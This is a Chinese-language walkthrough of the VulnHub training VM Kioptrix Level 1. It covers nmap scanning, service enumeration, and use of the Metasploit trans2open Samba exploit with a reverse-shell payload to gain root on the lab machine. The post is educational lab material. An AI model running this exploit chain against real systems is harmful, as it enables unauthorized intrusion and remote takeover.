当前位置: 首页 > news >正文

vulnhub靶场 Kioptrix-level-1

简介: vulnhub是一个提供靶场环境的平台。而Kioptrix-level-1就是一个对新手比较友好的靶场。初学渗透的同学可以做做试试看,项目地址如下。
项目地址:Kioptrix: Level 1 (#1) ~ VulnHub

信息收集

查看本机IP,靶机跟kali都是使用NAT模式,所以看一下本机IP,扫一下IP段就可以看到靶机的IP了。

nmap扫描存活,因为我NAT设置的起点范围是100所以我扫的是100-254.

nmap -sn 192.168.2.100-254

因为我本机没开,192.168.2.100是kali的IP,所以192.168.2.122就是靶机IP了。
锁定靶机IP为192.168.2.122

接下来对192.168.2.122进行一个常用端口扫描。

nmap -sS -v- n 192.168.2.122

可以看到开放了22,80,111,139,443,1024等端口,我们访问80端口可以看到是apache的默认首页。

对网页进行目录扫描发下如下路径。

dirsearch.py -u http://192.168.2.122

好像没什么用,查看一下其他端口,以及服务的版本信息。

nmap -sS -sV 192.168.2.122

端口服务版本信息

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MMYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:0C:61:80 (VMware)

重点看一下samba服务,用msf查看一下samba的版本

msf6 > use auxiliary/scanner/smb/smb_version 
msf6 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.2.122
rhosts => 192.168.2.122
msf6 auxiliary(scanner/smb/smb_version) > run[*] 192.168.2.122:139     - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 192.168.2.122:139     -   Host could not be identified: Unix (Samba 2.2.1a)
[*] 192.168.2.122:        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_version) > 

samba版本信息:Samba 2.2.1a
利用searchsploit Samba 2.2.1a 查看相关版本的samba是否存在漏洞。运气很好,有几个。我们使用msf试一下第一个。

msf6 auxiliary(scanner/smb/smb_version) > search trans2open

set rhosts 192.168.2.122                  # 设置目标
set payload linux/x86/shell_reverse_tcp   # 设置payload
run

成功获取root权限。Kioptrix-level-1这个靶场对新手来说还是挺友好的。初学者可以做做试试看。

http://www.lryc.cn/news/187159.html

相关文章:

  • 全网最细,真实企业性能测试落地实施,一文带你快速打通...
  • 三十一、【进阶】B+树的演变过程
  • 算法通过村第十三关-术数|白银笔记|术数高频问题
  • Java 线程的生命周期
  • Vue页面监听键盘按键的多种方法
  • 解析硬件连通性测试的重要性及测试方法
  • Hive窗口函数回顾
  • flink自定义窗口分配器
  • iOS CGRect CGPoint NSRange等结构体的NSLog打印输出
  • Viper FTP Mac/ftp管理工具
  • web漏洞-xml外部实体注入(XXE)
  • Impeller-Flutter的新渲染引擎
  • python 面试算法题
  • Python中的yield关键字
  • 怎么压缩pdf文件?分享缩小pdf文件的简单方法
  • 51单片机可调幅度频率波形信号发生器( proteus仿真+程序+原理图+报告+讲解视频)
  • Vuex的介绍
  • mysql基础语法速成版
  • Docker镜像 配置ssh
  • 12.2 实现键盘模拟按键
  • 《DevOps 精要:业务视角》- 读书笔记(七)
  • 【随想】每日两题Day.12(实则一题)
  • 基于复旦微JFM7K325T FPGA的高性能PCIe总线数据预处理载板(100%国产化)
  • 什么是原型链(prototype chain)?如何实现继承?
  • RabbitMQ 5种工作模式介绍和Springboot具体实现
  • C++ - 可变模版参数 - emplace相关接口函数 - 移动构造函数 和 移动赋值运算符重载 的 默认成员函数
  • 总结三:计算机网络面经
  • 服务器数据恢复-VMWARE ESX SERVER虚拟机数据恢复案例
  • COCI 2021-2022 #1 - Set 题解
  • 分享40个极具商业价值的chatGPT提问prompt